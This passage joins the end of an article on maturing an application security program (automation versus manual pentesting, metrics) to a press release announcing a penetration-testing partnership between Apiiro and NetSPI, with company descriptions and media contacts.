Additionally, having a dynamic pentesting platform that offers data points and risk scores aids in objectively identifying where AppSec is immature and what needs to be prioritized to remediate vulnerabilities that present the greatest risk.  

  Determine When to Use Automation in Vulnerability Discovery

To build an optimum, mature AppSec program, it is important to determine when it is best to use automation in vulnerability discovery and when to employ manual penetration testing. In short, an effective AppSec program includes the ability to manage and employ threat modeling, manual penetration testing, and secure code review, augmented with automated vulnerability discovery tools that are deployed at various phases of the SDLC process.

For example, automated testing like dynamic scanning, static analysis, and interactive security testing may be sufficient day to day, but manual penetration testing is warranted when significant architectural changes or technology upgrades to software systems are made. Finding balance in vulnerability discovery is important. It isn’t an either/or.

Vulnerabilities found in production cost roughly $7,600 to fix – 9,500% more than the $80 it would cost to fix those same vulnerabilities when they are detected early in the development process.

– WhiteSource reporting on a joint study by IBM and Ponemon Institute

  Insist on Metrics for Proper Data and Analysis

Consistent, timely, and accurate DevSecOps data measurements are important feedback for any organization to capture and analyze as it looks to govern development operations. Quality metrics (numbers with analysis and meaning in context) can ensure visibility, accountability, and management of software security initiatives. Proper application security program metrics allow you to articulate the AppSec program’s value to your organization’s leadership. The benefit? Being able to properly evangelize the value of your AppSec efforts makes it easier to procure funding and improve the security risk posture of your organization. Additionally, understanding the data at hand well enough to answer contextualized business questions allows for better strategic decision making.

  Maturity Attained: Be an Ambassador

What does an organization do once it determines its AppSec program is mature? First, decide if a mature program is a long-term goal. Obviously, security always needs to be a priority, but ongoing maturity programming can be expensive and time consuming. Secondly, there will undoubtedly always be areas that require more attention. While addressing them, I encourage organizations to share their program successes with the broader market. Become a leader and use AppSec maturity as a differentiator that can drive customer and team member goodwill, brand differentiation, and market leadership.


Apiiro and NetSPI Partner to Provide Contextual, Risk-Based Penetration Testing

Tel Aviv and Minneapolis, Minnesota  –  Apiiro, the industry’s first Code Risk Platform™, and NetSPI, the leader in penetration testing and attack surface management, today announced a strategic partnership to combine Apiiro’s comprehensive Application Risk Management capabilities with NetSPI’s Penetration Testing as a Service (PTaaS). The partnership enables contextual and risk-based application security testing for its mutual customers.

Organizations rely on penetration testing for releasing and maintaining secure applications. As a result of the partnership, NetSPI customers will be able to test their applications, networks, and cloud infrastructure at scale and manage their attack surfaces using risk visibility and context provided by Apiiro. NetSPI’s PTaaS will be supported by Apiiro’s comprehensive view of security and compliance risks and keen understanding of how to manage the complexities of a risk-based Secure Software Development Lifecycle (SSDLC).

To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of being performed on a set schedule, pentests should be performed continuously as high-risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities.

“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen, context-aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster,” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”

“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”

About Apiiro

Apiiro is the industry’s first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers’ knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Apiiro Media Contact:
Kelly Hall
Offleash PR for Apiiro
apiiro@offleashpr.com

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

